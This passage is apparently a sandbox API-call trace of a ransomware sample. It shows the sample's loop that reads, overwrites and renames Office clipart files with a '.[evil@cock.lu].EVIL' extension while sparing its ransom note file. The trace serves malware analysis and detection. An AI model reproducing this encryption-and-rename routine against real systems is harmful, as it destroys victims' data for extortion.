SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.197] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x60a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x60a0, lpOverlapped=0x0) returned 1 [0167.197] CloseHandle (hObject=0x1a8) returned 1 [0167.197] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.197] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.197] __uncaught_exception () returned 0x84b1160800 [0167.197] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.197] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748g.gif.[evil@cock.lu].evil")) returned 1 [0167.198] ??_V@YAXPEAX@Z () returned 0x1 [0167.201] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748G.GIF", dwFileAttributes=0x200) returned 0 [0167.201] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.201] wcsstr (_Str="PH02748U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.201] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 69 [0167.201] wcscmp (_String1="PH02748U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.201] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02748U.BMP") returned 0x0 [0167.201] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP") returned 0x45 [0167.201] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.203] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7e90, lpOverlapped=0x0) returned 1 [0167.206] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.206] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.206] _errno () returned 0x84b1160840 [0167.206] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.206] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x7ea0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7ea0, lpOverlapped=0x0) returned 1 [0167.206] CloseHandle (hObject=0x1a8) returned 1 [0167.206] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.207] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.207] __uncaught_exception () returned 0x84b1160800 [0167.207] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.207] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02748u.bmp.[evil@cock.lu].evil")) returned 1 [0167.208] ??_V@YAXPEAX@Z () returned 0x1 [0167.210] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02748U.BMP", dwFileAttributes=0x200) returned 0 [0167.211] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.211] wcsstr (_Str="PH02749G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.211] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 69 [0167.211] wcscmp (_String1="PH02749G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.211] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02749G.GIF") returned 0x0 [0167.211] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF") returned 0x45 [0167.211] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.215] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8795, lpOverlapped=0x0) returned 1 [0167.246] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.246] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.246] _errno () returned 0x84b1160840 [0167.246] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.246] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x87a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x87a0, lpOverlapped=0x0) returned 1 [0167.246] CloseHandle (hObject=0x1a8) returned 1 [0167.247] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.247] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.247] __uncaught_exception () returned 0x84b1160800 [0167.247] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.247] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749g.gif.[evil@cock.lu].evil")) returned 1 [0167.248] ??_V@YAXPEAX@Z () returned 0x1 [0167.251] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749G.GIF", dwFileAttributes=0x200) returned 0 [0167.252] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.252] wcsstr (_Str="PH02749U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.252] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP") returned 69 [0167.252] wcscmp (_String1="PH02749U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.252] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02749U.BMP") returned 0x0 [0167.252] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP") returned 0x45 [0167.252] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.254] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8118, lpOverlapped=0x0) returned 1 [0167.266] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.266] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.266] _errno () returned 0x84b1160840 [0167.266] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.266] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8120, lpOverlapped=0x0) returned 1 [0167.267] CloseHandle (hObject=0x1a8) returned 1 [0167.267] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.267] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.267] __uncaught_exception () returned 0x84b1160800 [0167.267] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.268] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp.[evil@cock.lu].evil")) returned 1 [0167.269] ??_V@YAXPEAX@Z () returned 0x1 [0167.272] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP", dwFileAttributes=0x200) returned 0 [0167.273] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.273] wcsstr (_Str="PH02750G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.273] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF") returned 69 [0167.273] wcscmp (_String1="PH02750G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.273] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02750G.GIF") returned 0x0 [0167.273] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF") returned 0x45 [0167.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.275] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x64c7, lpOverlapped=0x0) returned 1 [0167.280] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.280] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.280] _errno () returned 0x84b1160840 [0167.280] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.280] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x64e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x64e0, lpOverlapped=0x0) returned 1 [0167.280] CloseHandle (hObject=0x1a8) returned 1 [0167.280] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.280] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.280] __uncaught_exception () returned 0x84b1160800 [0167.280] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.281] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif.[evil@cock.lu].evil")) returned 1 [0167.282] ??_V@YAXPEAX@Z () returned 0x1 [0167.285] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF", dwFileAttributes=0x200) returned 0 [0167.285] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.290] wcsstr (_Str="PH02750U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.290] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP") returned 69 [0167.290] wcscmp (_String1="PH02750U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.290] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02750U.BMP") returned 0x0 [0167.290] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP") returned 0x45 [0167.291] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.293] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16f40, lpOverlapped=0x0) returned 1 [0167.303] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.303] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.303] _errno () returned 0x84b1160840 [0167.303] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.303] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x16f60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16f60, lpOverlapped=0x0) returned 1 [0167.303] CloseHandle (hObject=0x1a8) returned 1 [0167.304] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.304] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.304] __uncaught_exception () returned 0x84b1160800 [0167.304] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.304] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp.[evil@cock.lu].evil")) returned 1 [0167.306] ??_V@YAXPEAX@Z () returned 0x1 [0167.309] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP", dwFileAttributes=0x200) returned 0 [0167.309] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.309] wcsstr (_Str="PH02752G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.309] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF") returned 69 [0167.309] wcscmp (_String1="PH02752G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.309] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02752G.GIF") returned 0x0 [0167.309] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF") returned 0x45 [0167.309] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.312] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc382, lpOverlapped=0x0) returned 1 [0167.321] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.321] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.321] _errno () returned 0x84b1160840 [0167.321] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.321] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0xc3a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xc3a0, lpOverlapped=0x0) returned 1 [0167.321] CloseHandle (hObject=0x1a8) returned 1 [0167.321] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.321] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.321] __uncaught_exception () returned 0x84b1160800 [0167.322] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.322] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif.[evil@cock.lu].evil")) returned 1 [0167.323] ??_V@YAXPEAX@Z () returned 0x1 [0167.326] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF", dwFileAttributes=0x200) returned 0 [0167.326] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.326] wcsstr (_Str="PH02752U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.326] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP") returned 69 [0167.326] wcscmp (_String1="PH02752U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.326] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02752U.BMP") returned 0x0 [0167.326] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP") returned 0x45 [0167.326] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.329] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c08, lpOverlapped=0x0) returned 1 [0167.332] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.332] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.332] _errno () returned 0x84b1160840 [0167.332] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.332] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x7c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c20, lpOverlapped=0x0) returned 1 [0167.332] CloseHandle (hObject=0x1a8) returned 1 [0167.332] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0167.332] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0167.332] __uncaught_exception () returned 0x84b1160800 [0167.333] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0167.333] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp.[evil@cock.lu].evil")) returned 1 [0167.334] ??_V@YAXPEAX@Z () returned 0x1 [0167.337] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP", dwFileAttributes=0x200) returned 0 [0167.337] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0167.338] wcsstr (_Str="PH02753U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0167.338] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP") returned 69 [0167.338] wcscmp (_String1="PH02753U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0167.338] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH02753U.BMP") returned 0x0 [0167.338] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP") returned 0x45 [0167.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0167.340] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1a6b8, lpOverlapped=0x0) returned 1 [0167.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0167.349] _errno () returned 0x84b1160840 [0167.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x1a6c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, 